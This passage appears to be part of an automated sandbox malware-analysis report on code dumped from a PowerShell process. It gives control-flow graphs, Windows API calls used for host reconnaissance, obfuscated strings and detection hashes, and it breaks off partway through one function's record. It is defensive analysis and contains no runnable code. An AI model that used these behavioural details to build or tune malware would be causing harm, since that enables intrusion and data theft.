                                                                                      • Opcode Fuzzy Hash: 09428639afa91602ae49414ee6577e4f298c4b2ca618dd5c82e79861ecdb2e7a
                                                                                      • Instruction Fuzzy Hash: 8FC213B5A083408FD7248F24D8817ABB7E2EF96314F1A893DE4D987391D7389841CB4B
                                                                                      Function 004239B9 Relevance: 18.3, APIs: 3, Strings: 7, Instructions: 821COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 785 4239b9-4239ce 786 423a22-423a30 785->786 787 423990-42399c 785->787 788 4239e0-4239e8 785->788 789 423a20 785->789 790 423a06-423a14 785->790 791 423a37-423a51 785->791 792 42374a-42375f 785->792 793 4239ef-4239ff 785->793 786->788 786->791 786->792 787->785 788->786 788->787 788->788 788->789 788->790 788->791 788->792 788->793 790->789 791->786 791->787 791->788 791->789 791->790 791->791 791->792 791->793 794 423a58-423a5f 791->794 795 4237f2-4237f9 792->795 796 4237e0-4237ef 792->796 797 423770-42377e 792->797 798 4237b4-4237bc 792->798 799 4237c4-4237cc 792->799 800 423785-4237ad 792->800 801 42396a-423979 792->801 802 423919-423925 792->802 803 42392c-423940 792->803 793->786 793->788 793->789 793->790 793->791 793->792 818 423a68-423a72 794->818 795->797 805 423800-423834 795->805 806 4238c0-4238c5 795->806 807 4238d0 795->807 808 423840-423842 795->808 809 42384e-42385b 795->809 796->795 797->795 797->796 797->798 797->799 797->800 797->801 797->802 797->803 798->799 799->796 800->795 800->796 800->798 800->799 801->794 810 423ce2-423d2f call 407f50 801->810 811 423cc3 801->811 813 423980 801->813 814 423b50-423bd2 801->814 815 423a77-423a8a 801->815 816 423c85-423cbc call 407f50 RtlExpandEnvironmentStrings 801->816 817 423ccb-423cd5 call 407f60 801->817 801->818 819 423cd8-423ce1 801->819 802->795 802->796 802->798 802->799 802->801 802->803 803->794 803->801 803->810 803->811 812 423950-423963 803->812 803->813 803->814 803->815 803->816 803->817 803->818 803->819 805->808 806->807 807->802 808->809 823 423860-42387a 809->823 849 423d30-423d83 810->849 811->817 812->794 812->801 812->810 812->811 812->813 812->814 812->815 812->816 812->817 812->818 812->819 813->787 824 423be0-423c0c 814->824 836 423406-423412 815->836 816->810 816->811 816->817 816->819 844 423f9a-424035 816->844 845 423f79 816->845 846 423f69-423f71 816->846 847 423dfe-423e03 816->847 848 423e0c-423eba call 407f50 816->848 817->819 818->836 823->823 832 42387c-423883 823->832 824->824 825 423c0e-423c4f RtlExpandEnvironmentStrings 824->825 833 423c50-423c73 825->833 832->797 837 423889-423898 832->837 833->833 839 423c75-423c7e 833->839 838 4238a0-4238a7 837->838 842 4238d2-4238d8 838->842 843 4238a9-4238ac 838->843 839->810 839->811 839->816 839->817 839->819 839->844 839->845 839->846 839->847 839->848 842->797 852 4238de-423912 call 43e110 842->852 843->838 851 4238ae 843->851 854 424040-4240ce 844->854 857 423f7f-423f8b call 407f60 845->857 846->845 847->848 873 423ec0-423ee5 848->873 849->849 853 423d85-423d8e 849->853 851->797 852->795 852->796 852->798 852->799 852->800 852->801 852->802 852->803 858 423d90-423d96 853->858 859 423db1-423dc5 853->859 854->854 860 4240d4-4240dd 854->860 876 423f94 857->876 864 423da0-423daf 858->864 865 423de1-423dea call 4414b0 859->865 866 423dc7-423dca 859->866 867 4240e0 call 421d00 860->867 864->859 864->864 874 423def-423df7 865->874 870 423dd0-423ddf 866->870 872 4240e5-4240ea 867->872 870->865 870->870 877 4240f3-42410f 872->877 873->873 875 423ee7-423ef0 873->875 874->844 874->845 874->846 874->847 874->848 874->857 874->877 878 423ef2-423efa 875->878 879 423f11-423f1f 875->879 876->844 880 424110-42415b 877->880 882 423f00-423f0f 878->882 883 423f41-423f62 GetLogicalDrives call 4414b0 879->883 884 423f21-423f24 879->884 880->880 881 42415d-4241ce 880->881 885 4241d0-42427b 881->885 882->879 882->882 883->817 883->819 883->845 883->846 883->857 883->876 883->877 891 4242a7 883->891 892 4242ad-4242b9 call 407f60 883->892 886 423f30-423f3f 884->886 885->885 888 424281-42429e call 421b60 885->888 886->883 886->886 888->891 891->892
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ":B$+A#C=]=_$=]=_$_^]\$eN$p7B$rp
                                                                                      • API String ID: 0-2092896893
                                                                                      • Opcode ID: ed0750c71e1987e5a6d7bbb2feff7f6cba7481729a1a1e0e14759066178fedbc
                                                                                      • Instruction ID: 182eaf4e6841349a8ef13573fe29d1f0c1c004a6e50f6283d231cbe69a191b93
                                                                                      • Opcode Fuzzy Hash: ed0750c71e1987e5a6d7bbb2feff7f6cba7481729a1a1e0e14759066178fedbc
                                                                                      • Instruction Fuzzy Hash: 594267B5B04211CFD714CF28D8816AABBB2FF8A311F1A81BDD4459B395D738D942CB85
                                                                                      Function 00411227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 896 411227-41123f 897 411241-411244 896->897 898 411280-4112ae call 401870 897->898 899 411246-41127e 897->899 902 4112b0-4112b3 898->902 899->897 903 4112b5-4112fb 902->903 904 4112fd-411327 call 401870 902->904 903->902 907 411329-411364 call 414850 904->907 908 41132b-41132f 904->908 916 411366 907->916 917 411368-4113a9 call 407f50 call 40a8d0 907->917 910 411d26 908->910 911 412715 910->911 913 412717-412733 call 401f30 911->913 922 40f450-412744 913->922 923 40f457-40f487 call 401f40 913->923 916->917 929 4113ab-4113ae 917->929 930 40f489-40f48c 923->930 931 4113b0-4113f8 929->931 932 4113fa-41141e call 401870 929->932 933 40f4cc-40f51a call 401e30 930->933 934 40f48e-40f4ca 930->934 931->929 939 411420-411459 call 414850 932->939 940 411486-4114b6 call 414850 932->940 942 40f51c-40f545 933->942 943 40f51e-40f522 933->943 934->930 948 41145b 939->948 949 41145d-411481 call 407f50 call 40a8d0 939->949 951 4114b8 940->951 952 4114ba-41155f call 407f50 call 40a8d0 RtlExpandEnvironmentStrings 940->952 950 40f549-40f54c 942->950 943->913 948->949 949->940 954 40f5ad-40f5fe call 401970 950->954 955 40f54e-40f5ab 950->955 951->952 965 411562-411565 952->965 954->911 963 40f604 954->963 955->950 963->911 966 41156b-4115fa 965->966 967 4115ff-411615 965->967 966->965 968 411617-411628 call 407f60 967->968 969 41162d-411646 967->969 968->910 971 411648 969->971 972 41164a-4116ac call 407f50 969->972 971->972 978 4116db-411704 call 407f60 972->978 979 4116ae-4116d6 call 407f60 * 2 972->979 987 411706-411709 978->987 1002 411d24 979->1002 989 41170b-41173d 987->989 990 41173f-41175a call 401870 987->990 989->987 995 4117b6-4117d7 990->995 996 41175c-411788 call 414850 990->996 1000 4117da-4117dd 995->1000 1005 41178a 996->1005 1006 41178c-4117b4 call 407f50 call 40a8d0 996->1006 1003 411818-41185e call 401b80 1000->1003 1004 4117df-411816 1000->1004 1002->910 1010 411860-411863 1003->1010 1004->1000 1005->1006 1006->995 1012 411865-4118b6 1010->1012 1013 4118b8-4118e5 call 401a80 1010->1013 1012->1010 1018 4118e7 1013->1018 1019 4118ec-411930 call 401f30 1013->1019 1020 411bf1-411c75 call 408b60 call 4157c0 1018->1020 1025 411932 1019->1025 1026 411934-41194d call 407f50 1019->1026 1029 411c7a-411c89 call 409780 1020->1029 1025->1026 1032 41196f-411975 1026->1032 1033 41194f-411956 1026->1033 1039 411cc7-411cfa call 407f60 * 2 1029->1039 1040 411c8b-411c9a 1029->1040 1034 411977-411979 1032->1034 1036 411958-411964 call 414980 1033->1036 1037 411984-4119c4 call 401f40 1034->1037 1038 41197b-41197f 1034->1038 1048 411966-41196d 1036->1048 1053 4119c6-4119c9 1037->1053 1038->1020 1072 411d04-411d0e 1039->1072 1073 411cfc-411cff call 407f60 1039->1073 1045 411cb5-411cc5 call 407f60 1040->1045 1046 411c9c 1040->1046 1045->1039 1050 411c9e-411caf call 414b10 1046->1050 1048->1032 1061 411cb1 1050->1061 1062 411cb3 1050->1062 1057 4119cb-411a0c 1053->1057 1058 411a0e-411a55 call 401870 1053->1058 1057->1053 1067 411a57-411a5a 1058->1067 1061->1050 1062->1045 1069 411a79-411ac8 call 401870 1067->1069 1070 411a5c-411a77 1067->1070 1078 411aca-411acd 1069->1078 1070->1067 1076 411d10-411d13 call 407f60 1072->1076 1077 411d18-411d1f call 408c40 1072->1077 1073->1072 1076->1077 1077->1002 1081 411af6-411b48 call 401b80 1078->1081 1082 411acf-411af4 1078->1082 1085 411b4a-411b4d 1081->1085 1082->1078 1086 411b7c-411bec call 401b80 call 4149a0 1085->1086 1087 411b4f-411b7a 1085->1087 1086->1034 1087->1085
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: )$+$>$@$F$L$[$`
                                                                                      • API String ID: 0-4163809010
                                                                                      • Opcode ID: 044f42da5d756521c1d2f2a39874e1519ebd206fa650f033b5c434c037831c99
                                                                                      • Instruction ID: 2c21a52bb848bfcd7622a7916f474c4d624f7ec9d4be2f62fa6d6f295705de25
                                                                                      • Opcode Fuzzy Hash: 044f42da5d756521c1d2f2a39874e1519ebd206fa650f033b5c434c037831c99
                                                                                      • Instruction Fuzzy Hash: 8052A07260C7808BD3249B38C5943EFBBE1ABD5324F198A2EE5D9D73D1D63889418B47
                                                                                      Function 00408600 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 351threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1150 408600-408611 call 43d9a0 1153 408617-40861e call 4362a0 1150->1153 1154 408a48-408a4a ExitProcess 1150->1154 1157 408a31-408a38 1153->1157 1158 408624-40864a GetCurrentProcessId GetCurrentThreadId 1153->1158 1161 408a43 call 43e080 1157->1161 1162 408a3a-408a40 call 407f60 1157->1162 1159 408650-40887f SHGetSpecialFolderPathW 1158->1159 1160 40864c-40864e 1158->1160 1163 408880-4088ce 1159->1163 1160->1159 1161->1154 1162->1161 1163->1163 1166 4088d0-40891d call 43c540 1163->1166 1170 408920-408943 1166->1170 1171 408964-40897c GetForegroundWindow 1170->1171 1172 408945-408962 1170->1172 1173 408982-408a0b 1171->1173 1174 408a0d-408a25 call 409d00 1171->1174 1172->1170 1173->1174 1174->1157 1177 408a27 call 40cb90 1174->1177 1179 408a2c call 40b7b0 1177->1179 1179->1157
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00408624
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040862E
                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087FA
                                                                                      • GetForegroundWindow.USER32 ref: 00408974
                                                                                        • Part of subcall function 0040B7B0: FreeLibrary.KERNEL32(00408A31), ref: 0040B7B6
                                                                                        • Part of subcall function 0040B7B0: FreeLibrary.KERNEL32 ref: 0040B7D7
                                                                                      • ExitProcess.KERNEL32 ref: 00408A4A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                      • String ID: b]u)$}$}
                                                                                      • API String ID: 3676751680-2900034282
                                                                                      • Opcode ID: 6a07f0384f71d87041b62ad58867324155b1be50ba3e74cb306905e4ea8226d7
                                                                                      • Instruction ID: 3bf81113ce60e3950654fa87f9b5bc85db09618474996d7b9c4e13ef7b0d228f
                                                                                      • Opcode Fuzzy Hash: 6a07f0384f71d87041b62ad58867324155b1be50ba3e74cb306905e4ea8226d7
                                                                                      • Instruction Fuzzy Hash: C4C1E673E187144BC708DF69C84125AF7D6ABC8710F0AC53EA898EB391EA74DD048BC6
                                                                                      Function 0042D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1203 42d34a-42d362 1204 42d370-42d382 1203->1204 1204->1204 1205 42d384-42d389 1204->1205 1206 42d39b-42d3a7 1205->1206 1207 42d38b-42d38f 1205->1207 1209 42d3c1-42d40f call 43fe00 GetPhysicallyInstalledSystemMemory 1206->1209 1210 42d3a9-42d3ab 1206->1210 1208 42d390-42d399 1207->1208 1208->1206 1208->1208 1215 42d410-42d44d 1209->1215 1211 42d3b0-42d3bd 1210->1211 1211->1211 1213 42d3bf 1211->1213 1213->1209 1215->1215 1216 42d44f-42d498 call 41e960 1215->1216 1219 42d4a0-42d551 1216->1219 1219->1219 1220 42d557-42d55c 1219->1220 1221 42d55e-42d568 1220->1221 1222 42d57d-42d583 1220->1222 1223 42d570-42d579 1221->1223 1224 42d586-42d58e 1222->1224 1223->1223 1225 42d57b 1223->1225 1226 42d590-42d591 1224->1226 1227 42d5ab-42d5b3 1224->1227 1225->1224 1228 42d5a0-42d5a9 1226->1228 1229 42d5b5-42d5b6 1227->1229 1230 42d5cb-42d611 1227->1230 1228->1227 1228->1228 1231 42d5c0-42d5c9 1229->1231 1232 42d620-42d653 1230->1232 1231->1230 1231->1231 1232->1232 1233 42d655-42d65a 1232->1233 1234 42d65c-42d65d 1233->1234 1235 42d66d 1233->1235 1237 42d660-42d669 1234->1237 1236 42d670-42d67a 1235->1236 1238 42d68b-42d73c 1236->1238 1239 42d67c-42d67f 1236->1239 1237->1237 1240 42d66b 1237->1240 1241 42d680-42d689 1239->1241 1240->1236 1241->1238 1241->1241
                                                                                      APIs
                                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D3EE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                                      • String ID: ><+
                                                                                      • API String ID: 3960555810-2918635699
                                                                                      • Opcode ID: 3980c0afaf6dac2d4ca75895f3ce9cc4aa60152e4397ff49cad2d9ebd5e9afb7
                                                                                      • Instruction ID: 444f218a8ad5829191449d1546b31e79214a0b4c0f4cfb8ef7368535fe843fa0
                                                                                      • Opcode Fuzzy Hash: 3980c0afaf6dac2d4ca75895f3ce9cc4aa60152e4397ff49cad2d9ebd5e9afb7
                                                                                      • Instruction Fuzzy Hash: 72C1E575A047418FD725CF2AD490762FBE2BF9A310F28859EC4DA8B752C739E806CB54
                                                                                      Function 0043E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(0044148A,?,00000018,?,?,00000018,?,?,?), ref: 0043E13E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                      Function 0043240F Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 148memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1181 43240f-432445 1182 432447-43244a 1181->1182 1183 432474-43268b SysAllocString 1182->1183 1184 43244c-432472 1182->1184 1185 43268d-432690 1183->1185 1184->1182 1186 432692-4326cb 1185->1186 1187 4326cd-43270a 1185->1187 1186->1185 1189 432714-43274a 1187->1189
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocString
                                                                                      • String ID: 0$a$c$e$f$g
                                                                                      • API String ID: 2525500382-100324306
                                                                                      • Opcode ID: 6fa382de4c939dc68479ac497997f55f83f35014caf28410cf75d298f2d01ba0
                                                                                      • Instruction ID: 2beeffe621b162477516d1a3ffd6e32473519446922c4ca7b5322f15d7df1e3d
                                                                                      • Opcode Fuzzy Hash: 6fa382de4c939dc68479ac497997f55f83f35014caf28410cf75d298f2d01ba0
                                                                                      • Instruction Fuzzy Hash: EB91812110DBC28DD3328A7C595879BBED16BA7234F484B9EE0E98B3E6D7704106C767
                                                                                      Function 00409D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1190 409d1e-409d34 1191 409d40-409d52 1190->1191 1191->1191 1192 409d54-409d7e 1191->1192 1193 409d80-409d92 1192->1193 1193->1193 1194 409d94-409e13 LoadLibraryExW call 43d960 1193->1194 1197 409e20-409e32 1194->1197 1197->1197 1198 409e34-409e5e 1197->1198 1199 409e60-409e72 1198->1199 1199->1199 1200 409e74-409e80 LoadLibraryExW call 43d960 1199->1200 1202 409e85-409e98 1200->1202
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409D98
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409E78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: CKI
                                                                                      • API String ID: 1029625771-2433779057
                                                                                      • Opcode ID: 46ebf1f11a428727df2c69ed2ddcf1f0c4f78635cb5cf24ba122c25d2125fb43
                                                                                      • Instruction ID: 9df50abc4230604fad3af689b86cbcfc4f62151ff32a39ed9a717dc759385280
                                                                                      • Opcode Fuzzy Hash: 46ebf1f11a428727df2c69ed2ddcf1f0c4f78635cb5cf24ba122c25d2125fb43
                                                                                      • Instruction Fuzzy Hash: 1041EFB4D003009FEB149F789992A9A7F71EB06324F5152ADD4902F3E6C635981A8BE6
                                                                                      Function 0043058B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1250 43058b-4305b7 1251 4305b9-4305bc 1250->1251 1252 4305e6-43079b SysAllocString 1251->1252 1253 4305be-4305e4 1251->1253 1254 43079d-4307a0 1252->1254 1253->1251 1255 4307a2-4307c5 1254->1255 1256 4307c7-430808 1254->1256 1255->1254 1258 430812-43083e 1256->1258
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocString
                                                                                      • String ID: 0
                                                                                      • API String ID: 2525500382-4108050209
                                                                                      • Opcode ID: a93b0ace99ce6cd9ef1ee5a0699e5cb0abacc5689d21836a58def81c9232aac2
                                                                                      • Instruction ID: 1a9445c8793d311956368d230348da1e4d9d4d740bd027ac858feccbcef24786
                                                                                      • Opcode Fuzzy Hash: a93b0ace99ce6cd9ef1ee5a0699e5cb0abacc5689d21836a58def81c9232aac2
                                                                                      • Instruction Fuzzy Hash: ED91A420108FC28DD3328A3C9849797BFD11B63224F184B9DD1FA4A7E3D7A5A14AD766
                                                                                      Function 0042F67B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1259 42f67b-42f891 SysFreeString 1260 42f893-42f896 1259->1260 1261 42f8c8-42f908 1260->1261 1262 42f898-42f8c6 1260->1262 1264 42f912-42f93a 1261->1264 1262->1260
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeString
                                                                                      • String ID: 0
                                                                                      • API String ID: 3341692771-4108050209
                                                                                      • Opcode ID: 9e03d617818d9f894cb7bfd721b8e184e885285a2d937fda9489571d724eb846
                                                                                      • Instruction ID: 2a79e8d30ea64e7d5669e1a9b49d72b4a405202e71524aef1de41e0f80d44e43
                                                                                      • Opcode Fuzzy Hash: 9e03d617818d9f894cb7bfd721b8e184e885285a2d937fda9489571d724eb846
                                                                                      • Instruction Fuzzy Hash: 5A816A34108FC28AD332863C88587D7AFE15B67324F484B9DA1FE4A3E2D6656146C766
                                                                                      Function 0043E34B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1265 43e34b-43e357 1266 43e360-43e37a 1265->1266 1266->1266 1267 43e37c-43e409 GetForegroundWindow call 4402f0 1266->1267
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 0043E3BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: ForegroundWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2020703349-3019521637
                                                                                      • Opcode ID: 1a0742d174ed02cdc22a72f35ed7972a2a7288d22f9a72e178f62dae787fe3a6
                                                                                      • Instruction ID: 528e16a96f9d9f00b26d3e5e14e5fe829b229e0aa49aafaba4eb36a7b6cd6e75
                                                                                      • Opcode Fuzzy Hash: 1a0742d174ed02cdc22a72f35ed7972a2a7288d22f9a72e178f62dae787fe3a6
                                                                                      • Instruction Fuzzy Hash: FA112B7AE418614BEF08CF39DC171AA77A2B3C5325B2D56B98816E32D0DA3C5C068A84
                                                                                      Function 0040EF53 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EF57
                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040F09C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: c72aef12464a92cc2c3f2d51aa4abadf574ffcca3a61543972ef4f2091f679da
                                                                                      • Instruction ID: f51fb2f77ad80b64b0419191bf69b8e44a6001040ca864f0c8a1fa7d7adef59f
                                                                                      • Opcode Fuzzy Hash: c72aef12464a92cc2c3f2d51aa4abadf574ffcca3a61543972ef4f2091f679da
                                                                                      • Instruction Fuzzy Hash: 9341C6B4C10B40AFD370EF399A0B7137EB8AB05250F504B1DF9E6866D4E231A4198BD7
                                                                                      Function 0040EC77 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EC89
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040ECA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 640775948-0
                                                                                      • Opcode ID: fb62f50cd5accdd3f8c0e7536e39a1f07535dd0835aa916c8da64f7b89d0cef8
                                                                                      • Instruction ID: 738adb6083984dd8bacecb44fa1de3dd99d04845307cbd3813f349a55eb87af8
                                                                                      • Opcode Fuzzy Hash: fb62f50cd5accdd3f8c0e7536e39a1f07535dd0835aa916c8da64f7b89d0cef8
                                                                                      • Instruction Fuzzy Hash: 8BE042783D97417BF6795B14ED57F143225AB86F26F304314B7253D6E58AE03201451D
                                                                                      Function 00437764 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 0043779D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultLanguageUser
                                                                                      • String ID:
                                                                                      • API String ID: 95929093-0
                                                                                      • Opcode ID: bc18d378b5dd9222f1d4b2f2bf41a228d576f499a8aff68b17f4869370526a21
                                                                                      • Instruction ID: 54b6fee0e0571655c33f26142f93ff03fb1190c0e218daea6acb4e94425ab4d3
                                                                                      • Opcode Fuzzy Hash: bc18d378b5dd9222f1d4b2f2bf41a228d576f499a8aff68b17f4869370526a21
                                                                                      • Instruction Fuzzy Hash: 0C31E472A466418FD7158B78C8837ADBBE28BD5314F0A80AEE459C73A2D9388942CB10
                                                                                      Function 0043E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043E0E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: b084c91fa9192e24328343e825f84096d97414ba82a0ea4300841eb5d6395bab
                                                                                      • Instruction ID: ded93e649b1cf2343eaa9575ea92e3a5feecd1f56bb2e5dbe1310a0afb74cdc2
                                                                                      • Opcode Fuzzy Hash: b084c91fa9192e24328343e825f84096d97414ba82a0ea4300841eb5d6395bab
                                                                                      • Instruction Fuzzy Hash: CDF0EC76824231FBC3102F397D05A573674EFCB720F05143AF40056161DB78DC17969A
                                                                                      Function 0043E3A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 0043E3BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: ForegroundWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2020703349-0
                                                                                      • Opcode ID: 0e9d24a3901733470457e1249cc7f7470b5df7d452cc394c81079ce9d69cb8f4
                                                                                      • Instruction ID: 5efd1ee9a03ea3c3eb0c12d762aaad34ed982eea5bb01117e5cc31371429f0ae
